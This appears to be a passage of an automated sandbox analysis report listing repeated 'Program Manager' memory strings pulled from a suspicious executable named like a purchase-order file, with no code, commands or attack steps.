Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTY
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q49
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTX
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qR
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtu
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTS
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qts
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4a
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4_
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT~
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT}
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT\|
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4\
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTz
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4Z
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx+
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4g
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4f
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx)
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4e
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx&
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4M
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4W
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX%
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxA
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX!
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q!
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX-
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4n
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4m
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx:
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4t
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4r
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP=
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP;
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP9
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpX
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpV
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpL
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP,
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpJ
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP)
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpH
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP(
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP&
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP4
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpR
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP2
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpO
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0=
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp\|
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp{
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP[
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0;
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpz
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPX
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0D
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPc
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0B
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPb
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPa
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0@
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp~
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpl
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPL
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpj
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPJ
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpi
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpu
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qps
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPS
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP\|
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0\
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPm
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0F
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0R
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0P
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPo
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0O
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0N
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT!
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt?
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtG
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT'
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT&
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtE
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtC
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0l
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0k
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt/
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0j
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt.
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt-
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt+
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0g
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0f
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0t
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0r
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0p
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL9
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL7
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlW
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlV
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlT
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL@
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql]
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL;
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql[
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlH
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL&
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlF
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlC
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL#
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlJ
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlr
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,@
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL`
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL]
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql}
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql\|
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlz
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,$
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,#
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,"
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLB
